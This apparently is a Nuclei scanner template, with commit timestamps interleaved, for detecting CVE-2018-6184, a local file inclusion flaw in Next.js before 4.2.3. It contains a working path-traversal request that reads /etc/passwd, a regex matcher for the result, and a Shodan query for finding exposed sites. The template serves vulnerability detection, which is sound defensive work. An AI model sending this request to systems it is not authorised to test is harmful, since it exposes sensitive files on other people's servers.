2023-02-16 10:49:35 +00:00
id : CVE-2018-6184
info :
2023-03-07 21:18:20 +00:00
name : Zeit Next.js <4.2.3 - Local File Inclusion
2023-02-16 10:49:35 +00:00
author : DhiyaneshDK
severity : high
description : |
2023-03-10 20:00:55 +00:00
Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-02-16 10:49:35 +00:00
reference :
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java
2023-02-17 11:50:17 +00:00
- https://github.com/zeit/next.js/releases/tag/4.2.3
2023-03-07 21:18:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-6184
2023-02-16 10:49:35 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2018-6184
cwe-id : CWE-22
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-02-16 10:49:35 +00:00
shodan-query : html:"/_next/static"
tags : cve,cve2018,nextjs,lfi,traversal
2023-04-27 04:28:59 +00:00
http :
2023-02-16 10:49:35 +00:00
- method : GET
path :
- "{{BaseURL}}/_next/../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
- type : status
status :
- 200
2023-03-07 21:18:20 +00:00
# Enhanced by md on 2023/03/07